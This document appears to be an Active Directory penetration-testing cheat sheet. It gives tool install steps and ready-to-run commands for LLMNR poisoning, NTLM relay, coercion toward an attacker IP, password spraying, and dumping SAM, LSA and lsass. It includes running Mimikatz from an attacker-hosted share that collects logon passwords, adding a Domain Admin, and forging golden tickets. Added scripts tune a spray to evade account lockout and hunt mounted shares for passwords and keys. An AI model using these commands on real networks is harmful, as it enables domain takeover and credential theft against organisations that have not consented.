https://github.com/NotMedic/NetNTLMtoSilverTicket
https://www.n00py.io/2022/10/practical-attacks-against-ntlmv1/
How to pentest like a Gunnaj
Utils
https://github.com/GoVanguard/legion
Installation
https://www.reddit.com/r/Kalilinux/comments/1ann3xo/legion_running_perfectly_then_it_disappears/
https://github.com/lefayjey/linWinPwn
Installation
apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
git clone https://github.com/lefayjey/linWinPwn
cd linWinPwn; chmod +x linWinPwn.sh
chmod +x install.sh
./install.sh
https://github.com/BloodHoundAD/BloodHound
https://github.com/lgandx/Responder
Installation
apt install netexec
nano ~/.nxc/nxc.conf
[BloodHound]
bh_enabled = True
bh_uri = 127.0.0.1
bh_port = 7687
bh_user = <username>
bh_pass = <password>
https://github.com/jfjallid/go-secdump
Installation
sudo apt install golang-go
sudo apt install gccgo-go
git clone https://github.com/jfjallid/go-secdump
cd go-secdump/
go run main.go
go build
https://github.com/Hackplayers/evil-winrm
Installation
gem install evil-winrm
https://github.com/p0dalirius/FindUncommonShares
Installation
git clone https://github.com/p0dalirius/FindUncommonShares
cd FindUncommonShares/
pip install -r requirements.txt
https://github.com/topotam/PetitPotam
https://github.com/Wh04m1001/DFSCoerce
https://github.com/fortra/impacket
https://github.com/skelsec/pypykatz
Installation
pip3 install minidump minikerberos aiowinreg msldap winacl
git clone https://github.com/skelsec/pypykatz.git
cd pypykatz
python3 setup.py install
https://github.com/ly4k/Certipy
https://github.com/hmaverickadams/breach-parse
https://github.com/RUB-NDS/PRET
Installation
git clone https://github.com/RUB-NDS/PRET && cd PRET
python -m pip install colorama pysnmp
Lists
https://zzzteph.github.io/weakpass/
https://crackstation.net/files/crackstation.txt.gz (14.6 GB)
https://download.g0tmi1k.com/wordlists/large/36.4GB-18_in_1.lst.7z (48.4 GB)
Sites
NMAP
sudo nmap -sn -oN <output.txt> <IP/mask>
sudo nmap -Pn -sC -sV -p- -oN <output.txt> <IP/mask>
sudo nmap -Pn --script 'smb-vuln*' -p139,445 -oN <output.txt> <IP/mask>
nmcli dev show eth0
nslookup -type=SRV _ldap._tcp.dc._msdcs.<AD_domain>
nltest /dclist:<domainname>
linWinPwn
- Module ad_enum
- RID bruteforce using netexec
- Anonymous enumeration using netexec, enum4linux-ng, ldapdomaindump, ldeep
- Pre2k authentication check on collected list of computers
- Module kerberos
- kerbrute user spray
- ASREPRoast using collected list of users (and cracking hashes using john-the-ripper and the rockyou wordlist)
- Blind Kerberoast
- CVE-2022-33679 exploit
- Module scan_shares
- SMB shares anonymous enumeration on identified servers
- Module vuln_checks
- Enumeration for WebDAV, dfscoerce, shadowcoerce and Spooler services on identified servers
- Check for ms17-010, zerologon, petitpotam, nopac, smb-signing, ntlmv1, runasppl weaknesses
sudo ./linWinPwn.sh -t <Domain_Controller_IP_or_Target_Domain> -M user -o <output_dir>
- DNS extraction using adidnsdump
- Module ad_enum
- BloodHound data collection
- Enumeration using netexec, enum4linux-ng, ldapdomaindump, windapsearch, SilentHound, ldeep
- Users
- MachineAccountQuota
- Password Policy
- Users' descriptions containing "pass"
- ADCS
- Subnets
- GPP Passwords
- Check if ldap-signing is enforced, check for LDAP Relay
- Delegation information
- netexec find accounts with user=pass
- Pre2k authentication check on domain computers
- Extract ADCS information using certipy and certi.py
- Module kerberos
- kerbrute find accounts with user=pass
- ASREPRoasting (and cracking hashes using john-the-ripper and the rockyou wordlist)
- Kerberoasting (and cracking hashes using john-the-ripper and the rockyou wordlist)
- Targeted Kerberoasting (and cracking hashes using john-the-ripper and the rockyou wordlist)
- Module scan_shares
- SMB shares enumeration on all domain servers using smbmap and cme's spider_plus
- KeePass files and processes discovery on all domain servers
- Module vuln_checks
- Enumeration for WebDav, dfscoerce, shadowcoerce and Spooler services on all domain servers
- Check for ms17-010, ms14-068, zerologon, petitpotam, nopac, smb-signing, ntlmv1, runasppl weaknesses
- Module mssql_enum
- Check mssql privilege escalation paths
sudo ./linWinPwn.sh -t <Domain_Controller_IP_or_Target_Domain> -u <AD_user> -p <AD_password> -o <output_dir>
Responder
responder -I eth0
responder -I eth0 --lm
responder -I eth0 -d
NetExec lnkfile with slinky
netexec smb <Target_IP> -u <AD_user> -p <AD_password> -M slinky -o NAME=<filename> SERVER=<attacker_IP>
netexec smb <Target_IP> -u <AD_user> -p <AD_password> -M slinky -o NAME=<filename> SERVER=<attacker_IP> CLEANUP=True
NetExec NTLM-relay
netexec smb <IPs> --gen-relay-list <nosmbsigning.txt>
sudo python3 ntlmrelayx.py -of <outfile.txt> -tf <nosmbsigning.txt> -smb2support
./go-secdump --host <target> -n --relay
[Responder Core]
; Servers to start
SQL = On
SMB = Off
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On
DCERPC = On
WINRM = On
SNMP = Off
sudo responder -I eth0 -dwv
PetitPotam
python3 PetitPotam.py -d <Domain_Name> -u <AD_user> -p <AD_password> <attacker_IP> <target_IP>
DFSCoerce
python3 dfscoerce.py -d <Domain_Name> -u <AD_user> -p <AD_password> <attacker_IP> <target_IP>
NTLMV1 relaying
NetExec Password spray
netexec smb <Domain_Controller_IP> -u users.txt -p <password> --continue-on-success
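The spray line above is the right primitive, but run naively across several rounds it walks every account into the lockout threshold. The wrapper below is an added example, not from the page or from NetExec: it keeps the same netexec invocation, assumes netexec is on PATH (override with NXC=nxc, the files hold one user or one password per line), and assumes you already pulled the lockout threshold and observation window with `netexec smb <DC> -u <user> -p <pass> --pass-pol`. It tries threshold minus a safety margin passwords per window, then sleeps the window out before continuing.

```shell
# Added example: lockout-aware password spray around netexec (not from the page).
# Assumes: netexec on PATH (override with NXC=nxc), one user per line in $users,
# one candidate password per line in $pwlist, lockout policy already read with --pass-pol.
NXC="${NXC:-netexec}"

# spray_plan <lockout_threshold> [margin]: passwords that may be tried per user in
# one observation window. The margin leaves room for a real bad logon elsewhere.
# A threshold of 0 means no lockout policy.
spray_plan() {
    threshold=$1
    margin=${2:-2}
    if [ "$threshold" -eq 0 ]; then
        echo unlimited
        return 0
    fi
    allowed=$((threshold - margin))
    [ "$allowed" -lt 1 ] && allowed=1
    echo "$allowed"
}

# spray <DC_IP> <users.txt> <passwords.txt> <lockout_threshold> <observation_window_minutes>
# One password per round against the whole user list; only netexec's "[+]" lines reach stdout.
spray() {
    dc=$1; users=$2; pwlist=$3; threshold=$4; window_min=$5
    per_window=$(spray_plan "$threshold")
    tried=0
    while IFS= read -r pw || [ -n "$pw" ]; do
        [ -z "$pw" ] && continue
        if [ "$per_window" != unlimited ] && [ "$tried" -ge "$per_window" ]; then
            echo "[*] $tried passwords tried this window; sleeping $((window_min + 1)) min to stay under lockout" >&2
            sleep $(( (window_min + 1) * 60 ))
            tried=0
        fi
        # same command as the cheat-sheet line above; grep returns 1 on no hit, hence || true
        "$NXC" smb "$dc" -u "$users" -p "$pw" --continue-on-success | grep '\[+\]' || true
        tried=$((tried + 1))
    done < "$pwlist"
}
```

Usage: `spray 10.0.0.5 users.txt passwords.txt 5 30` with a threshold of 5 and a 30-minute window tries three passwords, waits 31 minutes, then tries the next three. Reset the window longer rather than shorter if the policy's "reset counter after" value differs from the observation window.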
NetExec domain authentication (use either -p <password> or -H <hash>, not both)
netexec smb <Domain_Controller_IP> -u <AD_user> -p <AD_password> -H <hash[LM:NT]>
NetExec local authentication
netexec smb <target_IP> -u <username> -H <hash[LM:NT]> --local-auth
NetExec rdp authentication
netexec rdp <target_IP> -u <username> -H <hash[LM:NT]> --local-auth
List readable or writable shares
netexec smb <target_IP> -u <username> -p <password> --shares --filter-shares READ WRITE
List uncommon shares and export as xlsx
python3 ./FindUncommonShares.py -au <username> -ap <password> -ad <AD_domain> -ai <Domain_Controller_IP> --readable --export-xlsx shares
Mount and unmount shares
sudo mount.cifs <//ip/folder> <./folder> -o user=<username>,password=<password>,dom=<AD_domain>
sudo umount <./folder>
grep -i <keyword> *
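The grep above looks at one directory level of one mount for one keyword. The functions below are an added example, not from the page: they assume the share is mounted at the directory passed as the first argument (mount.cifs as above) and GNU grep/find. They search recursively in the text file types that usually hold credentials (GPP Groups.xml, unattend files, scripts, configs, notes) and separately list files that are interesting by name alone (KeePass databases, PFX, web.config, backups). The keyword list is a starting point, not an exhaustive one.

```shell
# Added example (not from the page): credential hunting over a mounted share.
# Assumes the share is mounted at $1 and GNU grep/find are available.
LOOT_PATTERN='(password|passwd|pwd|cpassword|connectionstring|secret|api[_-]?key|BEGIN (RSA|OPENSSH) PRIVATE KEY)'

# loot_grep <dir>: case-insensitive, recursive, text files only (-I skips binaries).
loot_grep() {
    dir=$1
    grep -rIinE "$LOOT_PATTERN" \
        --include='*.txt' --include='*.xml' --include='*.ini' --include='*.inf' \
        --include='*.config' --include='*.conf' --include='*.cfg' --include='*.ps1' \
        --include='*.bat' --include='*.cmd' --include='*.vbs' --include='*.csv' \
        --include='*.log' --include='*.json' --include='*.yml' --include='*.yaml' \
        --include='*.rdp' --include='*.pem' --include='*.key' \
        --exclude-dir='Windows' "$dir" 2>/dev/null
}

# loot_files <dir>: files worth pulling back whatever they contain
# (binary containers or formats where the name itself is the tell).
loot_files() {
    dir=$1
    find "$dir" -type f \( -iname '*.kdbx' -o -iname '*.kdb' -o -iname '*.pfx' -o -iname '*.p12' \
        -o -iname 'id_rsa*' -o -iname '*.ppk' -o -iname 'unattend*.xml' -o -iname 'sysprep*.xml' \
        -o -iname 'web.config' -o -iname 'groups.xml' -o -iname 'ntds.dit' -o -iname '*.vmdk' \
        -o -iname '*.bak' \) 2>/dev/null
}

# Quick counts before reading the full output of a large share.
loot_hit_count()  { loot_grep  "$1" | wc -l | tr -d ' '; }
loot_file_count() { loot_files "$1" | wc -l | tr -d ' '; }
```

Usage: `loot_grep /mnt/share | less` after mounting, then `loot_files /mnt/share` for the things grep cannot read. A `cpassword=` hit is a GPP-stored password and is decryptable with the published key; a `Groups.xml` name hit without a `cpassword` match usually means the policy was already cleaned up.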
Domain authentication (netexec: either -p or -H; go-secdump: either --pass or --hash)
netexec ldap <target_IP> -u <username> -p <password> -H <hash[LM:NT]> -M adcs
netexec smb <target_IP> -u <username> -p <password> -H <hash[LM:NT]> -M masky -o CA='<ADCS_server_FQDN>\<CA_name>'
netexec smb <target_IP> -u <username> -p <password> -H <hash[LM:NT]> --sam
./go-secdump --domain <AD_domain> --host <target_IP> --user <username> --pass <password> --hash <hash[LM:NT]> --sam
netexec smb <target_IP> -u <username> -p <password> -H <hash[LM:NT]> --lsa
./go-secdump --domain <AD_domain> --host <target_IP> --user <username> --pass <password> --hash <hash[LM:NT]> --lsa
Local authentication
netexec smb <target_IP> -u <username> -p <password> -H <hash[LM:NT]> --local-auth --sam
./go-secdump --domain <AD_domain> --host <target_IP> --user <username> --pass <password> --hash <hash[LM:NT]> --sam --local
netexec smb <target_IP> -u <username> -p <password> -H <hash[LM:NT]> --local-auth --lsa
./go-secdump --domain <AD_domain> --host <target_IP> --user <username> --pass <password> --hash <hash[LM:NT]> --lsa --local
NetExec: dump lsass with hash_spider, which re-uses every recovered credential against the hosts BloodHound's AdminTo edges say it is local admin on, recursively (needs the [BloodHound] section in nxc.conf shown above)
netexec smb <target_IP> -u <username> -p <password> -H <hash[LM:NT]> --local-auth -M hash_spider
rundll32.exe keymgr.dll KRShowKeyMgr
NetExec dump with ReadLAPSPassword rights (read the LAPS password over LDAP, then use it as local admin with --laps)
netexec ldap <AD_domain> -u <username> -p <password> -H <hash[LM:NT]> -M laps
netexec smb <target_IP> -u <username> -p <password> -H <hash[LM:NT]> --laps --sam
netexec smb <target_IP> -u <username> -p <password> -H <hash[LM:NT]> --laps --lsa
Run Mimikatz from impacket's SMB share (the share lives on the attacker box, so the UNC path points at the attacker)
impacket-smbserver -smb2support <shareName> <sharePath>
\\<attacker_IP>\<shareName>\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > \\<attacker_IP>\<shareName>\output.txt
linWinPwn
- All of the "Standard User" checks
- Module pwd_dump
- LAPS and gMSA dump
- secretsdump on all domain servers
- NTDS dump using impacket, netexec and certsync
- Dump lsass on all domain servers using: procdump, lsassy, nanodump, handlekatz, masky
- Extract backup keys using DonPAPI, HEKATOMB
sudo ./linWinPwn.sh -t <Domain_Controller_IP> -d <AD_domain> -u <AD_user> -p <AD_password> -H <hash[LM:NT]> -K <kerbticket[./krb5cc_ticket]> -o <output_dir>
Examine lsass dump with pypykatz
pypykatz lsa minidump lsass.DMP
NetExec command execution (-x runs a cmd command, -X a PowerShell command; for smb, --exec-method picks one of the three methods)
- wmiexec: executes commands via WMI
- atexec: executes commands by scheduling a task with the Windows Task Scheduler
- smbexec: executes commands by creating and running a service
netexec <protocol> <target_IP> -u <username> -p <password> -H <hash[LM:NT]> -x <command>
netexec <protocol> <target_IP> -u <username> -p <password> -H <hash[LM:NT]> -X <command>
netexec <protocol> <target_IP> -u <username> -p <password> -H <hash[LM:NT]> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>
Evil-WinRM
evil-winrm -i <target_IP> -u <username> -p <password> -H <hash[LM:NT]>
Command to add a new Domain Admin (from a shell on a domain-joined host, e.g. Evil-WinRM)
net user <username> <password> /add /domain
net group "Domain Admins" <username> /add /domain
powershell.exe "Invoke-Command -ComputerName <DC_hostname> -ScriptBlock {Add-ADGroupMember -Identity 'Domain Admins' -Members <username>}"
Tickets
wmic useraccount where name="<username>" get sid
(the domain SID is the user SID without its trailing RID, e.g. S-1-5-21-x-y-z-1105 -> S-1-5-21-x-y-z)
Silver ticket (NT hash of the service or machine account):
python3 ticketer.py -nthash <service_account_nthash> -domain-sid <domain-sid> -domain <AD_domain> -dc-ip <Domain_Controller_IP> -spn <service>/<target_hostname.AD_domain> <user>
Golden ticket (NT hash of krbtgt):
python3 ticketer.py -nthash <krbtgt_nthash> -domain-sid <domain-sid> -domain <AD_domain> -dc-ip <Domain_Controller_IP> <user>
export KRB5CCNAME=<TGS_ccache_file>
klist
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
PRET
nmap -p 9100 <IP/mask>
http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet
pret.py target {ps,pjl,pcl}
Attack modes
hashcat64.exe -m <hash_type> -a 0 <hashes.txt> <passlist.txt> -o cracked.txt
hashcat64.exe -m <hash_type> -a 1 <hashes.txt> <passlist1.txt> <passlist2.txt> -o cracked.txt
hashcat64.exe -m <hash_type> -a 3 <hashes.txt> ?a?a?a?a?a?a?a?a --increment -o cracked.txt
hashcat64.exe -m <hash_type> -a 6 <hashes.txt> <passlist.txt> ?a?a?a?a?a?a?a?a --increment -o cracked.txt
hashcat64.exe -m <hash_type> -a 7 <hashes.txt> ?a?a?a?a?a?a?a?a --increment <passlist.txt> -o cracked.txt
- ?l = abcdefghijklmnopqrstuvwxyz
- ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
- ?d = 0123456789
- ?h = 0123456789abcdef
- ?H = 0123456789ABCDEF
- ?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
- ?a = ?l?u?d?s
- ?b = 0x00 - 0xff
- --increment-min
- --increment-max
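Before launching a mask or hybrid attack it is worth knowing how big the keyspace is, because `?a?a?a?a?a?a?a?a` is 95^8 and a ninth position multiplies that by 95 again. The shell functions below are an added example, not from the page or from hashcat: they compute a mask's keyspace from the built-in charset sizes listed above, the total work under --increment between two lengths, and a worst-case run time for a given hash rate. Custom charsets (?1 to ?4) are not handled.

```shell
# Added example (not from the page): hashcat mask keyspace and --increment work estimate.
# Charset sizes are hashcat's built-ins as listed above; ?1-?4 custom sets are not handled.
charset_size() {
    case $1 in
        l|u) echo 26 ;;
        d)   echo 10 ;;
        h|H) echo 16 ;;
        s)   echo 33 ;;
        a)   echo 95 ;;
        b)   echo 256 ;;
        *)   echo 0 ;;
    esac
}

# mask_keyspace <mask> [positions]: product of charset sizes over the first
# <positions> tokens of the mask (default: all). A literal character counts as 1.
mask_keyspace() {
    m=$1; limit=${2:-0}; total=1; i=0
    while [ -n "$m" ]; do
        i=$((i + 1))
        if [ "$limit" -gt 0 ] && [ "$i" -gt "$limit" ]; then
            break
        fi
        case $m in
            \?*) c=$(printf '%.1s' "${m#\?}")
                 n=$(charset_size "$c")
                 if [ "$n" -eq 0 ]; then
                     printf 'unknown charset ?%s\n' "$c" >&2
                     return 1
                 fi
                 m=${m#??} ;;
            *)   n=1
                 m=${m#?} ;;
        esac
        # shell arithmetic is 64-bit signed: refuse rather than silently wrap
        if [ "$total" -gt $((9223372036854775807 / n)) ]; then
            echo "keyspace exceeds 2^63-1" >&2
            return 1
        fi
        total=$((total * n))
    done
    echo "$total"
}

# mask_length <mask>: number of positions (each ?x or literal char is one).
mask_length() {
    m=$1; i=0
    while [ -n "$m" ]; do
        case $m in
            \?*) m=${m#??} ;;
            *)   m=${m#?} ;;
        esac
        i=$((i + 1))
    done
    echo "$i"
}

# increment_keyspace <mask> [min] [max]: total work for --increment, i.e. the sum of
# the keyspaces of every prefix length from --increment-min to --increment-max.
increment_keyspace() {
    m=$1; len=$(mask_length "$m"); min=${2:-1}; max=${3:-$len}
    [ "$max" -gt "$len" ] && max=$len
    sum=0; k=$min
    while [ "$k" -le "$max" ]; do
        sum=$((sum + $(mask_keyspace "$m" "$k")))
        k=$((k + 1))
    done
    echo "$sum"
}

# eta_seconds <keyspace> <hashes_per_second>: worst-case run time in whole seconds.
eta_seconds() { echo $(( $1 / $2 )); }
```

Usage: `eta_seconds "$(increment_keyspace '?a?a?a?a?a?a?a?a')" <rate>` with the rate hashcat's benchmark (`-b -m 1000`) reports for the mode; the hybrid modes -a 6 and -a 7 multiply the wordlist size by the mask keyspace.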
Hash types
hashcat64.exe -m 3000 -a 3 <LM-hashes.txt> -o cracked.txt
hashcat64.exe -m 1000 -a 3 <NTLM-hashes.txt> -o cracked.txt
hashcat64.exe -m 5500 -a 3 <NTLMv1-hashes.txt> -o cracked.txt
hashcat64.exe -m 5600 -a 0 <NTLMv2-hashes.txt> <passlist.txt> -o cracked.txt
hashcat64.exe -m 18200 -a 0 <asrep-hashes.txt> <passlist.txt> -o cracked.txt
hashcat64.exe -m 13100 -a 0 <krb5tgs-hashes.txt> <passlist.txt> -o cracked.txt
hashcat64.exe -m 19600 -a 0 <krb5tgs-aes128-hashes.txt> <passlist.txt> -o cracked.txt
hashcat64.exe -m 19700 -a 0 <krb5tgs-aes256-hashes.txt> <passlist.txt> -o cracked.txt
hashcat64.exe -m 19800 -a 0 <krb5pa-etype17-hashes.txt> <passlist.txt> -o cracked.txt
hashcat64.exe -m 19900 -a 0 <krb5pa-etype18-hashes.txt> <passlist.txt> -o cracked.txt
hashcat64.exe -m 2100 -a 0 <mscache2-hashes.txt> <passlist.txt> -o cracked.txt